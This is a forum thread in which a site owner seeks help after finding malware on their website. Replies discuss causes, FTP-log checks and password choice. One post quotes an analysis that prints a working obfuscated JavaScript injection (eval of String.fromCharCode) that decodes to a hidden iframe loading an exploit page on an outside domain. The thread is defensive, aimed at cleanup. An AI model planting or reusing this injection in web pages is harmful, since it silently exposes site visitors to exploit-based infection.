i seem to have a malware code hidden in in a part of my site, i think its in java but how do i find it, and how can i scan my host server for it?
i have removed everything from my pc, i think i have a page on the site that contains rouge code in a java file or js file, i need to know how to find it on the server and delete it
Well.. its possible that you are refering to cookies set by javascript from ad providors or what have you. Because its impossible for java or javascript to install any real spyware/malware on ones computer (aside from exploits in IE) Josh
What happens sometimes is that malware gets onto the machine some other way and then adds a malicious footer to every page served by the server. This footer may contain JS or Java. J.D.
ok guys update, seems my site was hacked, this is what i found on another forum after i found the code on the page on my site, :: Author: Webmaster (---.dip.t-dialin.net) Date: 01-17-05 00:50 Virus confirmed...here is what I found out: They use a Javascript menu from www. apycom. com on http:// www. www. southeastacademy. org/ index.html and along with the menu code comes this line: <script language=javascript>eval (String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116 ,101,40,34,60,105, 102,114,97,109,101,32,98,111,114,100,101,114,61, 48,32,119,105,100,116 ,104,61,48,32,104,101,105, 103,104,116,61,48,32,115,116,121,108,101,61,39 , 100,105,115,112,108,97,121,58,110,111,110,101,39 ,32,115,114,99,61,39, 104,116,116,112,58,47,47,118,120,105,102,114,97, 109,101,46,98,105,122, 47,97,100,118,101,114,116,115,47,48,53,47,49,46, 112,104,112,39,62,60, 47,105,102,114,97,109,101,62,34,41))</script> the string above encodes the following Javascript code which will be evaluated because of the eval() statement: document.write("<iframe border=0 width=0 height=0 style='display:none' src='http: //vxiframe. biz/adverts /05 /1.php '></iframe>") The codes opens an invisible IFrame with content from this address: http: //vxiframe.biz /adverts/05/1.php The domain vxiframe.biz has an interesting startpage (****) but the PHP file at at the address above is even more interesting because it starts a Java.ByteVerify.exploit trojan :-/ Thanks for the info al, I'll inform the webmaster of the High School about the problem which is easy to fix. Marc now how i was hacked i dont know, how they got that into the head of a page i dont know, but its worrying, and i have deleted it from the page, and need to do something but i dont know what, any ideas? sammie x
Pick a phrase instead of a word and *always* use mixed letter case. If you can throw in some punctuation, it will help as well. This way you won't have to remember auto-generated passwords. J.D.
Yes. Scramble it as much as you can. MyP455WoRd&M0R3 or choose a word like 'fish' but then go with keyboard letter to the left so you get 'duag'. I even once worked out the keyboard as if it was abcdefg instead of qwerty. Yuo can scramble an easy to remember word with a fairly easy to remember cypher like that and it will be damn hard to crack.
ok and i just changed all my pws 2 weeks ago, hmmm thats about the same time as i think this was done, because i lost 1/2 of my hits about then to.
Go through your FTP logs to see if anybody tried a few passwords before they got in. Usually, a dictionary attack will result in the affected FTP log files being much larger than others - look first at those that are much bigger then the rest. Make sure you *never* browse the web when logged onto your server (that is if you are using some remote desktop software, like VNC). Depending on what you are using to connect to your server, you may have allowed some malware from your desktop to get into the server while you were connected. Another possibility is that if some spyware monitors what you type and simply transferred your FTP passwords to the bad guys. J.D.
ok i think i need to look much more into this, that page that was targeted is the most used page than any other on the whole site, its used about 200% more that the next page. so i think it was a hacker and put that to sell his ads on. pw change comming soon brb and thanx guys for all your help sammie xox